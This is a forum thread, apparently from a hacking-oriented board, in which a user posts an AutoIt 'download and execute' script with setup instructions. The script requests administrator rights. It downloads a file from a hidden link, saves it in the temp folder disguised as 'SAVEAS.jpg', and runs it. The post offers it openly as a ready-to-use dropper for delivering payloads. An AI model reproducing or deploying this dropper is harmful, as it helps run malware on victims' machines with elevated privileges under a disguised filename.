Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked download & run


sQuo

Recommended Posts

Re: download & run

 

Much better coder then me told me once ,if you don't know for what this code is and how to use it then you don't need it !

But ok everybody starts some day : download & run says everything or not ? Its a simple download and execute function dude, just edit sDownloadLink and sSavePath to your file :whistling:

Edited by djiziri
Link to comment
Share on other sites

Re: download & run

 

Copy:

#RequireAdmin

 

 

Global Const $sDownloadLink = "

This is the hidden content, please
"

Global Const $sSavePath = @TempDir & "SAVEAS.jpg"

 

Local $DownloadFile = InetGet($sDownloadLink, $sSavePath, 1, 1)

Do

Sleep(250)

Until InetGetInfo($DownloadFile, 2)

If FileExists($sSavePath) Then

If FileGetSize($sSavePath) = InetGetSize($sDownloadLink) Then

ShellExecute($sSavePath)

EndIf

EndIf

 

Download AutoIt

Copy text and paste to: SciTE.exe

Change the "redcolor" Text with your downloadlink

Save As

Execute

#havefun

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.